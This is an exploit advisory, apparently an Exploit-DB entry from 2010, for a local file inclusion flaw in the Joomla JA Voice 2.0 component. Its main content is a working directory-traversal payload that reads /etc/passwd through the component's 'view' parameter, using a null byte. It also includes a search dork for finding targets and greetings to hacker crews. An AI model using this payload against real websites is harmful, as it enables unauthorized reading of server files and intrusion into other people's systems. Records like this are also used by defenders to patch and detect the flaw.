Joomla! Component JA Voice 2.0 - Local File Inclusion

EDB-ID:

12121


Author:

kaMtiEz

Type:

webapps


Platform:

PHP

Date:

2010-04-09


[!]===========================================================================[!]

[~] Joomla Component JA Voice LFI vulnerability 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 9 april, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.joomlart.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.joomlart.com/forums/downloads.php?do=file&id=533


[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_javoice&view=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4,


[ NOTE ] 

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : lup u :">
[+] CS-31 : thanks for coming in my t0wn :D

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..